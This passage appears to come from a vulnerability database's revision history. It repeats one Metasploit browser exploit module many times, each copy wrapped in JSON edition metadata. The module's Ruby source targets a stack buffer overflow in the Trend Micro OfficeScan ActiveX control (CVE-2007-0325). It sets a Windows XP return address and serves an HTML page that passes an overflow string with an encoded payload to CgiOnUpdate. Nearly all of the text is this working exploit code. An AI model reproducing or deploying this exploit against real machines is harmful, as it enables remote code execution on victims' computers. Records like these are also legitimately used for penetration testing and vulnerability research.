rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-10-31T01:41:35", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 9, "lastseen": "2017-10-31T01:41:35"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-11-20T15:07:43", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 10, "lastseen": "2017-11-20T15:07:43"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2017-11-20T16:07:36", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 10.0, "modified": "2017-11-20T16:07:36"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 11, "lastseen": "2017-11-20T16:07:36"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-01-16T18:13:58", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": null, "modified": "2018-01-16T18:13:58"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 12, "lastseen": "2018-01-16T18:13:58"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-01-17T00:11:50", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 10.0, "modified": "2018-01-17T00:11:50"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 13, "lastseen": "2018-01-17T00:11:50"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-01-30T12:11:47", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 10.0, "modified": "2018-01-30T12:11:47"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 14, "lastseen": "2018-01-30T12:11:47"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-01-30T14:10:10", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 10.0, "modified": "2018-01-30T14:10:10"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 15, "lastseen": "2018-01-30T14:10:10"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-02-01T06:09:52", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 10.0, "modified": "2018-02-01T06:09:52"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 16, "lastseen": "2018-02-01T06:09:52"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "2007-08-31T11:58:31", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "lastseen": "2018-02-01T14:10:20", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 10.0, "modified": "2018-02-01T14:10:20"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "differentElements": ["modified", "published"], "edition": 17, "lastseen": "2018-02-01T14:10:20"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "viewCount": 0, "id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2007-0325"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "metasploitReliability": "Normal", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' 